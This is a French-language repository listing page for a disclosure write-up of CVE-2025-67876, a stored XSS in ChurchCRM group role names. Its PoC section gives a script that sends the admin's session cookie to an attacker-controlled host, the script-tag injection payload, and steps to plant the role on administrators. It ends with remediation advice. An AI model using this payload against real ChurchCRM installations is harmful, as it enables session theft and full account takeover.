Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-67876 — Preuve de concept détaillée de CVE-2025-67876 démontrant une XSS stockée dans les noms de rôles de groupe de ChurchCRM menant à un détournement de session administrateur, avec un guide d'exploitation complet et des recommandations de correction. | Kitploit
Outils/GitHubGitHub/lukasz-rybak/cve-2025-67876
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionArticles et RechercheApprentissage et Éducation
GitHublukasz-rybak/cve-2025-67876

CVE-2025-67876

Preuve de concept détaillée de CVE-2025-67876 démontrant une XSS stockée dans les noms de rôles de groupe de ChurchCRM menant à un détournement de session administrateur, avec un guide d'exploitation complet et des recommandations de correction.

Voir le dépôt
4il y a 5 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-67876: ChurchCRM a une XSS stockée dans le nom des rôles de groupe entraînant le détournement de session administrateur

Aperçu

ChampDétails
CVE IDCVE-2025-67876
GravitéCRITIQUE
AvisVoir l'avis
Découvert parLukasz Rybak

Produits concernés

  • ChurchCRM/CRM

Détails

Résumé

Une vulnérabilité de script intersite (XSS) stockée existe dans ChurchCRM qui permet à un utilisateur à faibles privilèges disposant de l'autorisation « Gérer les groupes » d'injecter du JavaScript persistant dans les noms des rôles de groupe. La charge utile est enregistrée dans la base de données et exécutée chaque fois qu'un utilisateur (y compris les administrateurs) consulte une page qui affiche ce rôle, comme GroupView.php ou PersonView.php. Cela permet un détournement complet de session et une prise de contrôle du compte.

Détails

La cause première est un manque de validation des entrées et d'encodage de sortie dans la gestion des noms de rôles de groupe.

Lors de l'édition d'un groupe dans GroupEditor.php, l'utilisateur peut modifier les noms des rôles. L'application ne nettoie pas l'entrée (par exemple, pas de strip_tags, htmlspecialchars ou validation côté serveur). La valeur est stockée dans la table list_lst de la base de données.

Plus tard, la valeur stockée est injectée directement dans le HTML sans échappement :

  • Dans GroupView.php, les rôles de groupe apparaissent dans les cellules du tableau enveloppés dans .
  • Dans PersonView.php, les rôles attribués à l'utilisateur sont affichés sous « Groupes attribués ». Comme aucun échappement n'est appliqué, tout HTML ou JavaScript stocké dans le nom du rôle est exécuté dans le navigateur de la victime.

Un utilisateur à faibles privilèges (avec Gérer les groupes) peut donc élever ses privilèges au niveau administrateur complet en injectant du JavaScript dans un rôle et en attribuant ce rôle à un administrateur.

PoC

Phase 1 - Configuration de l'attaquant

Créez x.js sur la machine contrôlée par l'attaquant :

fetch('http://172.20.0.1:8000/log?cookie=' + encodeURIComponent(document.cookie));

Servez le fichier :

python3 -m http.server 800

Phase 2 - Injection de la charge utile XSS

  1. Connectez-vous en tant qu'utilisateur disposant de l'autorisation Gérer les groupes.

    image
  2. Accédez à : Groupes → Liste des groupes → sélectionnez un groupe → Paramètres.

  3. Dans la section « Rôles de groupe », modifiez un rôle existant ou créez-en un nouveau.

  4. Insérez la charge utile malveillante :

"><script src=//172.20.0.1:800/x.js></script>

image

Dans la liste des rôles de groupe, cliquez sur Par défaut à côté du rôle contenant votre charge utile XSS injectée. Cela garantit que le rôle malveillant sera automatiquement attribué à tout utilisateur ajouté au groupe, augmentant ainsi la probabilité qu'un administrateur déclenche la XSS lors de la consultation de son profil. image Cliquez sur Supprimer à côté du rôle par défaut précédent, généralement « Membre ». La suppression du rôle propre par défaut oblige le système à utiliser le rôle injecté XSS pour toutes les attributions futures, garantissant l'exécution lorsque la victime consulte une page affichant son rôle attribué. image

  1. Enregistrez le nom du rôle. image

Phase 3 - Attribution du rôle malveillant à une victime

  1. Accédez à la page d'affichage du groupe.

  2. Ajoutez un utilisateur comme membre du groupe (par exemple, Church Admin).

    image
  3. Sélectionnez le rôle malveillant dans le menu déroulant.

  4. Enregistrez l'attribution.

    image

Phase 4 - Exécution de la XSS

Lorsque la victime (administrateur) consulte :

  • Son profil utilisateur : PersonView.php

    image
  • La page d'affichage du groupe : GroupView.php

Le JavaScript stocké s'exécute immédiatement.

Sur le serveur de l'attaquant, des requêtes entrantes apparaîtront : image

image

Cela confirme la réussite de la prise de contrôle du compte.

Impact

  • XSS stockée
  • Détournement complet de session administrateur
  • Élévation de privilèges d'un utilisateur à faibles droits à un administrateur complet du système
  • Exposition de toutes les données personnelles sensibles stockées dans ChurchCRM

CWE

CWE-79 : Neutralisation incorrecte de l'entrée lors de la génération de pages Web (« Cross-site Scripting »)

Recommandation

  • Implémentez un encodage de sortie (htmlspecialchars) pour tous les rendus de noms de rôles.
  • Validez et nettoyez les noms de rôles côté serveur.
  • Examinez les autres champs modifiables basés sur des listes pour des vulnérabilités similaires.
  • Envisagez l'utilisation d'une bibliothèque d'échappement centralisée ou d'un moteur de templates.

Références

  • https://github.com/ChurchCRM/CRM/security/advisories/GHSA-j9gv-26c7-3qrh

Avertissement

Ce CVE a été divulgué de manière responsable conformément aux pratiques de divulgation coordonnée des vulnérabilités. Les informations fournies ici sont à des fins éducatives et défensives uniquement.

Télécharger l’outil